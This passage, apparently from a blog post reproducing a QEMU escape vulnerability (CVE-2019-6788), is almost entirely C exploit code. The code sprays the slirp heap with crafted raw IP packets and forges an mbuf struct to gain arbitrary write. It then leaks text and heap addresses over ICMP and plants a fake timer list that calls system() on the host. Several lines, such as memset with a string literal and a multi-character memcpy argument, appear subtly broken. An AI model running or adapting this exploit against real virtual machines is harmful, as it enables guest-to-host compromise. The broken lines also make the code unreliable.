    char buf[IP_MAXPACKET], cvalue;
    char *ptr;
    int i, chksumlen = 0;

    // ptr points to beginning of buffer buf
    ptr = &buf[0];

    // Copy source IP address into buf (32 bits)
    memcpy(ptr, &iphdr.ip_src.s_addr, sizeof(iphdr.ip_src.s_addr));
    ptr += sizeof(iphdr.ip_src.s_addr);
    chksumlen += sizeof(iphdr.ip_src.s_addr);

    // Copy destination IP address into buf (32 bits)
    memcpy(ptr, &iphdr.ip_dst.s_addr, sizeof(iphdr.ip_dst.s_addr));
    ptr += sizeof(iphdr.ip_dst.s_addr);
    chksumlen += sizeof(iphdr.ip_dst.s_addr);

    // Copy zero field to buf (8 bits)
    *ptr = 0;
    ptr++;
    chksumlen += 1;

    // Copy transport layer protocol to buf (8 bits)
    memcpy(ptr, &iphdr.ip_p, sizeof(iphdr.ip_p));
    ptr += sizeof(iphdr.ip_p);
    chksumlen += sizeof(iphdr.ip_p);

    // Copy TCP length to buf (16 bits)
    svalue = htons(sizeof(tcphdr) + payloadlen);
    memcpy(ptr, &svalue, sizeof(svalue));
    ptr += sizeof(svalue);
    chksumlen += sizeof(svalue);

    // Copy TCP source port to buf (16 bits)
    memcpy(ptr, &tcphdr.th_sport, sizeof(tcphdr.th_sport));
    ptr += sizeof(tcphdr.th_sport);
    chksumlen += sizeof(tcphdr.th_sport);

    // Copy TCP destination port to buf (16 bits)
    memcpy(ptr, &tcphdr.th_dport, sizeof(tcphdr.th_dport));
    ptr += sizeof(tcphdr.th_dport);
    chksumlen += sizeof(tcphdr.th_dport);

    // Copy sequence number to buf (32 bits)
    memcpy(ptr, &tcphdr.th_seq, sizeof(tcphdr.th_seq));
    ptr += sizeof(tcphdr.th_seq);
    chksumlen += sizeof(tcphdr.th_seq);

    // Copy acknowledgement number to buf (32 bits)
    memcpy(ptr, &tcphdr.th_ack, sizeof(tcphdr.th_ack));
    ptr += sizeof(tcphdr.th_ack);
    chksumlen += sizeof(tcphdr.th_ack);

    // Copy data offset to buf (4 bits) and
    // copy reserved bits to buf (4 bits)
    cvalue = (tcphdr.th_off << 4) + tcphdr.th_x2;
    memcpy(ptr, &cvalue, sizeof(cvalue));
    ptr += sizeof(cvalue);
    chksumlen += sizeof(cvalue);

    // Copy TCP flags to buf (8 bits)
    memcpy(ptr, &tcphdr.th_flags, sizeof(tcphdr.th_flags));
    ptr += sizeof(tcphdr.th_flags);
    chksumlen += sizeof(tcphdr.th_flags);

    // Copy TCP window size to buf (16 bits)
    memcpy(ptr, &tcphdr.th_win, sizeof(tcphdr.th_win));
    ptr += sizeof(tcphdr.th_win);
    chksumlen += sizeof(tcphdr.th_win);

    // Copy TCP checksum to buf (16 bits)
    // Zero, since we don't know it yet
    *ptr = 0;
    ptr++;
    *ptr = 0;
    ptr++;
    chksumlen += 2;

    // Copy urgent pointer to buf (16 bits)
    memcpy(ptr, &tcphdr.th_urp, sizeof(tcphdr.th_urp));
    ptr += sizeof(tcphdr.th_urp);
    chksumlen += sizeof(tcphdr.th_urp);

    // Copy payload to buf
    memcpy(ptr, payload, payloadlen);
    ptr += payloadlen;
    chksumlen += payloadlen;

    // Pad to the next 16-bit boundary
    for (i = 0; i < payloadlen % 2; i++, ptr++) {
        *ptr = 0;
        ptr++;
        chksumlen++;
    }

    return csum((uint16_t *)buf, chksumlen);
}

uint8_t * alloc_uint(int len){
    uint8_t *tmp;

    if (len <= 0) {
        printf("ERROR: Cannot allocate memory because len = %i in "
                   "allocate_ustrmem().\n",
                   len);
        exit(EXIT_FAILURE);
    }

    tmp = (uint8_t *)malloc(len * sizeof(uint8_t));
    if (tmp != NULL) {
        memset(tmp, 0, len * sizeof(uint8_t));
        return (tmp);
    } else {
        printf(
            "ERROR: Cannot allocate memory for array allocate_ustrmem().\n");
        exit(EXIT_FAILURE);
    }
}

char * alloc_char(int len){
    char* tmp;

    if(len <= 0){
        printf("Error: can't alloc char meme len=%i in alloc_char\n", len);
        exit(EXIT_FAILURE);
    }

    tmp = (char *)malloc(len* sizeof(char));
    if(tmp != NULL){
        memset(tmp, 0, len*sizeof(char));
        return tmp;
    }
    else{
        printf("Error: can't alloc char mem in alloc_cahr\n");
        exit(EXIT_FAILURE);
    }
}

int* alloc_int(int len){
    int* tmp;
    if(len <= 0){
        printf("Error len <=0 in alloc_int\n");
        exit(EXIT_FAILURE);
    }

    tmp = (int*)malloc(len*sizeof(int));
    if(tmp != NULL){
        memset(tmp, 0, len*sizeof(int));
        return tmp;
    }
    else{
        printf("Error: can't alloc int mem in alloc_int\n");
        exit(EXIT_FAILURE);
    }
}

void spray_chunk(int size, uint16_t ip_id){
    int sock;
    uint8_t *packet;
    char* interface1, *src_ip, *dst_ip;
    struct ifreq ifr;
    struct ip iphdr;
    int * ip_flags, *tcp_flags;
    char* payload;
    int payloadlen;
    int status;
    struct tcphdr tcphdr;
    int i = 0;
    struct sockaddr_in sin;
    const int on = 1;

    packet = alloc_uint(IP_MAXPACKET);
    interface1 = alloc_char(40);
    src_ip = alloc_char(INET_ADDRSTRLEN);
    dst_ip = alloc_char(INET_ADDRSTRLEN);
    ip_flags = alloc_int(4);
    tcp_flags = alloc_int(8);
    payload = alloc_char(IP_MAXPACKET);

    payloadlen = size - 84;

    //Interface to send packet through
    strcpy(interface1, interface);

    //Submit request for a socket descriptor to look up interface
    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0){
        Err("socket() failed to get sock descriptor for using ioctl()");
        exit(EXIT_FAILURE);
    }

    //use ioctl() to look up interface index which we will use to 
    //bind socket descriptor sd to specified interface with setsockopt() since
    //none of the other arguments of sendto() specify which interface to use
    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface1);
    //printf("sock iotcl begin\n");
    if(ioctl(sock, SIOCGIFINDEX, &ifr) < 0){
        Err("ioctl() failed to find interface");
        exit(EXIT_FAILURE);
    }
    close(sock);
    
    //source IPV4 address: you need to fill this out
    strcpy(src_ip, "127.0.0.1");
    strcpy(dst_ip, "127.0.0.1");

    //IPV4 header
    //IPv4 header length (4 bits): Number of 32-bit words in header = 5
    iphdr.ip_hl = IP4_HDRLEN /sizeof(uint32_t);
    //Internet Protocol version (4 bits): IPv4
    iphdr.ip_v = 4;
    //Type of service (8 bits)
    iphdr.ip_tos = 0;
    //Total length of datagram (16 bits): IP header + TCP header + TCP data
    iphdr.ip_len = htons(IP4_HDRLEN + TCP_HDRLEN + payloadlen);
    //ID sequence number (16 bits): unused, since single datagram
    iphdr.ip_id = htons(ip_id);
    //Flags, and Fragmentation offset (3, 13 bits): 0 since single datagram
    // Zero (1 bit)
    ip_flags[0] = 0;
    //Do not fragment flag (1 bit)
    ip_flags[1] = 0;
    //More fragments following flag (1 bit)
    ip_flags[2] = 1;
    // Fragmentation offset (13 bit)
    ip_flags[3] = 0;

    iphdr.ip_off = htons((ip_flags[0] << 15) + (ip_flags[1] << 14) +
                    (ip_flags[2] << 13) + ip_flags[3]);
    //Time-to-live (8 bits): default to maximum value
    iphdr.ip_ttl = 225;
    //Transport layer protocol (8 bits): 6 for TCP
    iphdr.ip_p = IPPROTO_TCP;

    //source IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, src_ip, &(iphdr.ip_src))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //Destination IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, dst_ip, &(iphdr.ip_dst))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //IPv4 header checksum (16 bits): set to 0 when calculating checksum
    iphdr.ip_sum = 0;
    iphdr.ip_sum = csum((uint16_t *)&iphdr, IP4_HDRLEN);

    //TCP header
    //Source port number (16 bits)
    tcphdr.th_sport = htons(60);
    //Destination port number (16 bits)
    tcphdr.th_dport = htons(80);
    //Sequence number (32 bits)
    tcphdr.th_seq = htonl(0);
    //Acknowledgement number (32 bits)
    tcphdr.th_ack = htonl(0);
    //Reserved (4 bits): should be 0
    tcphdr.th_x2 = 0;
    //Data offset (4 bits): size of TCP header in 32-bit words
    tcphdr.th_off = TCP_HDRLEN / 4;

    //Flags (8 bits)
    //FIN flag (1 bit)
    tcp_flags[0] = 0;
    //SYN flag (1 bit)
    tcp_flags[1] = 0;
    //RST flag (1 bit)
    tcp_flags[2] = 0;
    //PSH flag (1 bit)
    tcp_flags[3] = 1;
    //ACK flag (1 bit)
    tcp_flags[4] = 1;
    // URG flag (1 bit)
    tcp_flags[5] = 0;
    //ECE flag (1 bit)
    tcp_flags[6] = 0;
    //CWR flag (1 bit)
    tcp_flags[7] = 0;
    tcphdr.th_flags = 0;
    for(i=0; i<8; i++){
        tcphdr.th_flags += (tcp_flags[i] << i);
    }

    //window size (16 bits)
    tcphdr.th_win = htons(65535);
    //Urgent pointer (16 bits): 0 (only valid of URG flag is set)
    tcphdr.th_urp = htons(0);
    //TCP checksum (16 bits)
    tcphdr.th_sum = tcp4_checksum(iphdr, tcphdr, (uint8_t *)payload, payloadlen);

    //prepare packet
    //First part is an IPv4 header
    memcpy(packet, &iphdr, IP4_HDRLEN*sizeof(uint8_t));
    //Next part of packet is upper layer protocol header
    memcpy((packet+IP4_HDRLEN), &tcphdr, TCP_HDRLEN*sizeof(uint8_t));
    //Last part is upper layer protocol data
    memcpy((packet+IP4_HDRLEN+TCP_HDRLEN), payload, payloadlen*sizeof(uint8_t));

    //The kernel os going to prepare layer 2 information (ethernet frame header) for us
    //For that, we need to specify a destination for the kernel in order for it to decide
    //where to send the raw datagram. we fill in a struct in_addr with the desired destination IP address
    //and pass this structure to the sendto() function
    memset(&sin, 0, sizeof(struct sockaddr_in));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = iphdr.ip_dst.s_addr;

    //submit request for a raw socket descriptor
    if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
        Err("socket failed");
        exit(EXIT_FAILURE);
    }

    //ser flag so socket expects us to provide IPv4 header
    if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) <0){
        Err("setsockopt() failed to set IP_HDRINCL");
        exit(EXIT_FAILURE);
    }

    //Bind socket to interface index
    if(setsockopt(sock, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof(ifr)) <0){
        Err("setsockopt() failed to bind to interface");
        exit(EXIT_FAILURE);
    }

    //send packet
    if(sendto(sock, packet, IP4_HDRLEN+TCP_HDRLEN+payloadlen, 0, 
                (struct sockaddr *)&sin, sizeof(struct sockaddr)) <0){
        Err("sendto() failed");
        exit(EXIT_FAILURE);
    }

    //closed socket descriptor
    close(sock);
    //Free allocated memory
    free(packet);
    free(interface1);
    free(src_ip);
    free(dst_ip);
    free(ip_flags);
    free(tcp_flags);
    free(payload);
}

// Build IPv4 ICMP pseudo-header and call checksum function.
uint16_t icmp4_checksum(struct icmp icmphdr, uint8_t *payload, int payloadlen) {
    char buf[IP_MAXPACKET];
    char *ptr;
    int chksumlen = 0;
    int i;

    ptr = &buf[0]; // ptr points to beginning of buffer buf

    // Copy Message Type to buf (8 bits)
    memcpy(ptr, &icmphdr.icmp_type, sizeof(icmphdr.icmp_type));
    ptr += sizeof(icmphdr.icmp_type);
    chksumlen += sizeof(icmphdr.icmp_type);

    // Copy Message Code to buf (8 bits)
    memcpy(ptr, &icmphdr.icmp_code, sizeof(icmphdr.icmp_code));
    ptr += sizeof(icmphdr.icmp_code);
    chksumlen += sizeof(icmphdr.icmp_code);

    // Copy ICMP checksum to buf (16 bits)
    // Zero, since we don't know it yet
    *ptr = 0;
    ptr++;
    *ptr = 0;
    ptr++;
    chksumlen += 2;

    // Copy Identifier to buf (16 bits)
    memcpy(ptr, &icmphdr.icmp_id, sizeof(icmphdr.icmp_id));
    ptr += sizeof(icmphdr.icmp_id);
    chksumlen += sizeof(icmphdr.icmp_id);

    // Copy Sequence Number to buf (16 bits)
    memcpy(ptr, &icmphdr.icmp_seq, sizeof(icmphdr.icmp_seq));
    ptr += sizeof(icmphdr.icmp_seq);
    chksumlen += sizeof(icmphdr.icmp_seq);

    // Copy payload to buf
    memcpy(ptr, payload, payloadlen);
    ptr += payloadlen;
    chksumlen += payloadlen;

    // Pad to the next 16-bit boundary
    for (i = 0; i < payloadlen % 2; i++, ptr++) {
        *ptr = 0;
        ptr++;
        chksumlen++;
    }

    return csum((uint16_t *)buf, chksumlen);
}

void hexdump(void *addr, int len){
    unsigned char buff[17];
    unsigned char *pc = (unsigned char*)addr;
    int i;

    for(i=0; i<len; i++){
        if((i % 16) == 0){
            if (i != 0){
                printf("  %s\n", buff);
            }
            printf("   %04x ", i);
        }
        printf(" %02x", pc[i]);

        if((pc[i] < 0x20) || (pc[i] > 0x7e)){
            buff[i % 16] = '.'; 
        }
        else{
            buff[i % 16] = pc[i];
        }
        buff[(i % 16) + 1] = '\0';
    }
    while((i % 16) != 0){
        printf("    ");
        i++;
    }
    printf("  %s\n", buff);
}

void send_ip_pkt(struct ip_pkt_info* pkt_info, uint8_t *payload,
                int payloadlen){
    int status, sd, *ip_flags, *tcp_flags;
    const int on = 1;
    char* interface1, *src_ip, *dst_ip;
    struct ip iphdr;
    uint8_t *packet;
    struct sockaddr_in sin;
    struct ifreq ifr;

    //Allocate memory for various arrays
    packet = alloc_uint(IP_MAXPACKET);
    interface1 = alloc_char(40);
    src_ip = alloc_char(INET_ADDRSTRLEN);
    dst_ip = alloc_char(INET_ADDRSTRLEN);
    ip_flags = alloc_int(4);
    tcp_flags = alloc_int(8);

    strcpy(interface1, interface);

    if((sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
        Err("socket failed to get socket descriptor in socket");
    }

    memset(&ifr, 0, sizeof(ifr));
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", interface1);
    if(ioctl(sd, SIOCGIFINDEX, &ifr) < 0){
        Err("ioctl failed in send_ip_pkt");
    }
    close(sd);

    strcpy(src_ip, "127.0.0.1");
    strcpy(dst_ip, "127.0.0.1");

    //
    iphdr.ip_hl = IP4_HDRLEN / sizeof(uint32_t);
    iphdr.ip_v = 4;
    iphdr.ip_tos = 0;
    iphdr.ip_len = htons(IP4_HDRLEN + payloadlen);
    iphdr.ip_id = htons(pkt_info->ip_id);
    // Zero (1 bit)
    ip_flags[0] = 0;
    // Do not fragment flag (1 bit)
    ip_flags[1] = 0;
    //More fragments following flag (1 bit)
    ip_flags[2] = pkt_info->MF;
    // Fragmentation offset (13 bits)
    ip_flags[3] = 0;

    iphdr.ip_off = htons((ip_flags[0]<<15) + (ip_flags[1]<<14) + (ip_flags[2])<<13 +
                ip_flags[3] +( pkt_info->ip_off>>3));
    //Time-to-live (8 bits): default to maximum value
    iphdr.ip_ttl = 255;
    //Transport layer protocol (8 bits): 6 for TCP
    //iphdr.ip_p = IPPROTO_TCP
    iphdr.ip_p = pkt_info->ip_p;

    // Source IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, src_ip, &(iphdr.ip_src))) != 1){
        printf("inet_pton() failed\n Error message: %s\n", strerror(status));
        exit(EXIT_FAILURE);
    }

    //Destination IPv4 address (32 bits)
    if((status = inet_pton(AF_INET, dst_ip, &(iphdr.ip_dst))) != 1){
        printf("inet_pton failed\n Error message: %s", strerror(status));
        exit(EXIT_FAILURE);
    }

    //IPv4 header checksum (16 bits): set 0 when calculating checksum
    iphdr.ip_sum = 0;
    iphdr.ip_sum = csum((uint16_t *)&iphdr, IP4_HDRLEN);

    //prepare packet
    // 1st part is an IPv4 header
    memcpy(packet, &iphdr, IP4_HDRLEN*sizeof(uint8_t));
    //last part is upper layer protocol data
    memcpy(packet+IP4_HDRLEN, payload, payloadlen*sizeof(uint8_t));

    //
    memset(&sin, 0, sizeof(struct sockaddr_in));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = iphdr.ip_dst.s_addr;

    //Submit request for a raw socket descriptor
    if((sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
        Err("socket failed");
    }

    // Set flag so socket expects us to provide IPv4 header
    if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0){
        Err("setsockopt failed to set IP_HDRINCL");
    }

    //Bind socket to interface index
    if(setsockopt(sd, SOL_SOCKET, SO_BINDTODEVICE, &ifr, sizeof(ifr)) < 0){
        Err("setsockopt() failed to bind to interface");
    }

    // Send packet
    if(sendto(sd, packet, IP_HDRINCL+TCP_HDRLEN+payloadlen, 0,
            (struct sockaddr *)&sin, sizeof(struct sockaddr)) <0){
        Err("sendto failed");
    }

    close(sd);
    free(packet);
    free(interface1);
    free(src_ip);
    free(dst_ip);
    free(ip_flags);
    free(tcp_flags);
}

void arbitray_write(uint64_t addr, int addr_len, uint8_t* write_data,
                    int write_data_len, int spray_times){
    int s, len, i;
    struct sockaddr_in ip_addr;
    int ret;
    struct ip_pkt_info pkt_info;

    uint8_t *payload = (uint8_t*)malloc(IP_MAXPACKET);
    uint8_t *payload_start = payload;
    uint32_t *payload32 = (uint32_t*)payload;
    uint64_t *payload64 = (uint64_t*)payload;

    memset(payload, "a", 0x1000);
    memcpy(payload, "A1ex", 4);

    printf("[+] spray chunk \n");
    for(i=0; i<spray_times; i++){
        printf("spray 0x2000 chunk, id: %d\n", i);
        spray_chunk(0x2000, spray_ip_id+i);
    }
    printf("spray finished\n");

    s = socket(AF_INET, SOCK_STREAM, 0);
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr(host);
    ip_addr.sin_port = htons(113);  //Id pro
    len = sizeof(struct sockaddr_in);
    printf("connect so_srv malloc\n");
    ret = connect(s, (struct sockaddr*)&ip_addr, len);  //so_srv malloc
    if(ret == -1){
        Err("connect in arbitray_write");
    }
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_p = 0xff;
    pkt_info.ip_off = 0;
    pkt_info.MF = 1;
    printf("malloc mbuf 1\n");
    send_ip_pkt(&pkt_info, payload, 0x300+4);
    printf("[+] Now we finished the malloc of so_rcv and the mbuf\n");

    /*

    */
    for(i=0; i<6; ++i){
        write(s, payload, 0x500);   

        //usleep()
        printf("send %d complete\n", i+1);
    }
    write(s, payload, 1072);
    //actual overflow here
    *payload64++ = 0;
    *payload64++ = 0x675;   // chunk header
    *payload64++ = 0;       // m_next
    *payload64++ = 0;       // m_prev
    *payload64++ = 0;       // m_nextpkt
    *payload64++ = 0;       // m_prevpkt
    payload32 = (uint32_t *)payload64;
    *payload32++ = 0;       // m_flags
    *payload32++ = 0x608;   // m_size
    payload64 = (uint64_t *)payload32;
    *payload64++ = 0;   // m_so
    payload = (uint8_t *)payload64;
    assert(addr_len <= 8);
    for(i=0; i<addr_len; ++i){
        *payload++ = (addr>> (i*8)) & 0xff; //m_data
    }
    write(s, payload_start, (uint8_t *)payload - payload_start);

    printf("[+]Now we have written faked mbuf struct\n");
    if(stop_flag){
        puts("trigger!");
        getchar();
    }
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0x300 + 24;
    pkt_info.MF = 0;
    pkt_info.ip_p = 0xff;
    send_ip_pkt(&pkt_info, write_data, write_data_len);
    printf("[+]Now we have trigger the written to target addr\n");

    close(s);
    free(payload_start);
    return 0;
}

void leak(uint64_t addr, int addr_len){
    int s, len, i, recvsd;
    struct sockaddr_in ip_addr;
    int ret;
    struct ip_pkt_info pkt_info;

    uint8_t *payload = (uint8_t *)malloc(IP_MAXPACKET);
    uint8_t *payload_start = payload;
    uint32_t *payload32 = (uint32_t *)payload;
    uint64_t *payload64 = (uint64_t *)payload;

    memset(payload, 'a', 0x1000);
    memcpy(payload, 'a1exxx', 6);

    printf("leak data:\n");
    for(i = 0; i<0x20; ++i){
        spray_chunk(0x2000, spray_ip_id+i);
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    ip_addr.sin_family = AF_INET;
    ip_addr.sin_addr.s_addr = inet_addr(host);
    ip_addr.sin_port = htons(113);
    len = sizeof(struct sockaddr_in);
    //malloc so_rcv
    ret = connect(s, (struct sockaddr*)&ip_addr, len);
    if(ret == -1){
        Err("connect failed in leak");
    }

    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0;
    pkt_info.ip_p = IPPROTO_ICMP;
    pkt_info.MF = 1;
    //malloc mbuf
    send_ip_pkt(&pkt_info, payload, 0x300+4);   //mbuf is after so_rcv

    //leak
    for(i=0; i<6; i++){
        write(s, payload, 0x500);

        printf("send %d ok\n", i);
    }
    write(s, payload, 1072);

    *payload64++ = 0;
    *payload64++ = 0x675;   //chunk header
    *payload64++ = 0;       // m_next
    *payload64++ = 0;       // m_prev
    *payload64++ = 0;       // m_nextpkt
    *payload64++ = 0;       // m_prevpkt
    payload32 = (uint32_t*)payload64;
    *payload32++ = 0;       // m_flags
    *payload32++ = 0x608;   // m_size
    payload64 = (uint64_t *)payload32;
    *payload64++ = 0;       // m_so
    payload = (uint8_t *)payload64;
    assert(addr_len <= 8);
    for(i=0; i<addr_len; ++i){
        *payload++ = (addr >>(i*8)) & 0xff; //m_data
    }
    //chunk overflow
    //change icmp's mbuf->m_data to fake_icmp_response_data
    write(s, payload_start, (uint8_t *)payload - payload_start);

    printf("[+]leaking: Now we have finished faking m_data\n");
    printf("trigger reass!\n");
    memset(payload, 'a', 0x1000);
    memcpy(payload, 'a1exxx', 6);
    pkt_info.ip_id = 0xdead;
    pkt_info.ip_off = 0x300 + 24;
    pkt_info.MF = 0;
    pkt_info.ip_p = IPPROTO_ICMP;

    recvsd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    send_ip_pkt(&pkt_info, payload, 0);
    printf("[+] leaking: Now we hace finished writing to target\nAlso, this means \n");

    //recv data
    int bytes, status;
    struct ip *recv_iphdr;
    struct icmp *recv_icmphdr;
    uint8_t recv_ether_frame[IP_MAXPACKET];
    struct sockaddr from;
    socklen_t fromlen;
    struct timeval wait, t1, t2;
    struct timezone tz;
    double dt;

    (void)gettimeofday(&t1, &tz);
    wait.tv_sec = 2;
    wait.tv_usec = 0;
    setsockopt(recvsd, SOL_SOCKET, SO_RCVTIMEO, (char*)&wait,
            sizeof(struct timeval));
    recv_iphdr = (struct ip*)(recv_ether_frame + ETH_HDRLEN);
    recv_icmphdr = (struct icmp*)(recv_ether_frame + ETH_HDRLEN + IP4_HDRLEN);
    int count = 0;
    while(1){
        memset(recv_ether_frame, 0, IP_MAXPACKET*sizeof(uint8_t));
        memset(&from, 0, sizeof(from));
        fromlen = sizeof(from);
        if((bytes = recvfrom(recvsd, recv_ether_frame, IP_MAXPACKET, 0,
                    (struct sockaddr*)&from, &fromlen)) < 0){
            status = errno;
            if(status == EAGAIN){   //EAGAIN = 11
                printf("No reply within %li seconds\n", wait.tv_sec);
                exit(EXIT_FAILURE);
            }else if(status == EINTR){
                continue;
            }else{
                printf("recvfrom failed");
                exit(EXIT_FAILURE);
            }
        }
        //
        printf("recv count %d\n", count++);
        if((((recv_ether_frame[12] << 8) + recv_ether_frame[13]) == ETH_P_IP) 
            && (recv_iphdr->ip_p == IPPROTO_ICMP) 
            && (recv_icmphdr->icmp_type == ICMP_ECHOREPLY)){
            (void)gettimeofday(&t2, &tz);
            dt = (double)(t2.tv_sec - t1.tv_sec) * 1000.0 +
                 (double)(t2.tv_usec - t1.tv_usec) / 1000.0;
            printf("%g ms (%i bytes received)\n", dt, bytes);
            printf("ping recv:\n");
            hexdump(recv_ether_frame, bytes);

            if(bytes < 0x200)
                continue;
            text_base =
                ((*(uint64_t *)(recv_ether_frame + 0x58)) - 0x217bc80) & ~0xfff;
            heap_base = (*(uint64_t *)(recv_ether_frame + 0xa8)-0x1b0) & ~0xffffff;
            dbg_printf("leak text_base: 0x%lx\n"
                       "leak heap_base: 0x%lx\n",
                       text_base, heap_base);
            break;
        }
    }

    close(s);
    close(recvsd);
    free(payload_start);
}

void fake_timer(){

}

int main(){
    char eth_frame[] = "\x52\x56\x00\x00\x00\x02\x52\x54\x00\x12\x34\x56\x08\x00";
    struct icmp *icmphdr;
    struct ip* iphdr;
    uint8_t buf[IP_MAXPACKET];
    char src_ip[INET_ADDRSTRLEN], dst_ip[INET_ADDRSTRLEN];
    int status;

    memcpy(buf, eth_frame, ETH_HDRLEN);
    iphdr = (struct ip*)(buf + ETH_HDRLEN);
    strcpy(src_ip, "10.0.2.15");
    strcpy(dst_ip, "10.0.2.2");

    iphdr->ip_hl = IP4_HDRLEN / sizeof(uint32_t);
    iphdr->ip_v = 4;
    iphdr->ip_tos = 0;
    iphdr->ip_len = ICMP_HDRLEN;
    iphdr->ip_id = 0xcdcd;
    // Zero (1 bit)
    // Do not fragment flag (1 bit)
    // More fragments following flag (1 bit)
    // Fragmentation offset (13 bits)
    iphdr->ip_off = ((0<<15) + (0<<14) + (0<<13) + (0>>3));
    iphdr->ip_ttl = 255;
    iphdr->ip_p = IPPROTO_ICMP;
    if((status = inet_pton(AF_INET, src_ip, &(iphdr->ip_src))) != 1 || 
        (status = inet_pton(AF_INET, dst_ip, &(iphdr->ip_dst))) != 1){
            printf("inet_pton() failed, Error message: %s", strerror(status));
            exit(EXIT_FAILURE);
    }
    iphdr->ip_sum = 0;
    iphdr->ip_sum = csum((uint16_t *)&iphdr, IP4_HDRLEN);

    icmphdr = (struct icmp*)(buf + ETH_HDRLEN + IP4_HDRLEN);
    icmphdr->icmp_type = ICMP_ECHO;
    //Message Code (8 bits): echo request
    icmphdr->icmp_code = 0;
    //Identifier (16 bits):usually pid of sending process - pick a number
    icmphdr->icmp_seq = htons(0);
    //ICMP header checksum (16 bits):set to 0 when calculating checksum
    // TBD
    //icmphdr->icmp_cksum = icmp4_checksum(icmphdr, data, datalen)
    icmphdr->icmp_cksum = icmp4_checksum(*icmphdr, buf, 0);
    
    const char exec_cmd[] = "/usr/bin/xcalc";
    printf("icmp packet over\n");
    memcpy(buf+ETH_HDRLEN+IP4_HDRLEN+ICMP_HDRLEN, exec_cmd, strlen(exec_cmd)+1);
    spray_ip_id = 0xaabb;
    printf("arbitrary write icmp mbuf begin\n");
    // for(int i=0x0; i<0x20; i++){
    //     spray_chunk(0x2000, spray_ip_id+i);
    // }
    //arbitrary write fake_icmp_response_pkt
    arbitray_write(0x0b00, 3, buf,
        ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN + strlen(exec_cmd)+1, 0x250+0x50);
    printf("arbitrary write icmp mbuf ok\n");
    getchar();

    printf("leak text and heap addr\n");
    leak(0xb00+0x318+0x14+ETH_HDRLEN, 3);

    uint64_t fake_timer_list = heap_base + 0x1000;
    *(uint64_t *)buf = text_base + 0x12c3920;   //qemu_clocks
    memset(buf+8, 0, 8*6);
    *(uint64_t *)(buf+0x38) = 0x0000000100000000;
    *(uint64_t *)(buf+0x40) = fake_timer_list + 0x70;   // active_timers
    *(uint64_t *)(buf+0x48) = 0;
    *(uint64_t *)(buf+0x50) = 0;
    *(uint64_t *)(buf+0x58) = text_base + 0x30eeda;     // qemu_timer_notify_cb
    *(uint64_t *)(buf + 0x60)=0;
    *(uint64_t *)(buf + 0x68) = 0x0000000100000000;     

    *(uint64_t *)(buf + 0x70) = 0;  // expire_time set to 0 will tirgger func cb
    *(uint64_t *)(buf + 0x78) = fake_timer_list;
    *(uint64_t *)(buf + 0x80) = text_base + 0x2be010;    // system_plt
    *(uint64_t *)(buf + 0x90) = 0;
    *(uint64_t *)(buf + 0x98) = 0x000f424000000000;
    spray_ip_id = 0xccbb;
    printf("forge fake timer_list in buf");
    arbitray_write(fake_timer_list - 0x318, 8, buf, 0xa0, 0x20);
    printf("[+] Now we have finished writing fake timer list\n");

    stop_flag = 1;
    *(uint64_t *)buf = fake_timer_list; //qemu_clocks
    spray_ip_id = 0xddbb;
    arbitray_write(text_base + 0x12c39000 - 0x318, 8, buf, 8, 0x20);
    printf("[+] Now we have finished writing main_loop_tlg\n");
    return 0;
}

参考文献

qemu-pwn cve-2019-6788堆溢出漏洞分析

CVE-2019-6788 Qemu逃逸漏洞复现与分析

本文作者： A1ex
本文链接： http://yoursite.com/2021/10/24/CVE-2019-6788-Qemu逃逸漏洞复现与分析/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！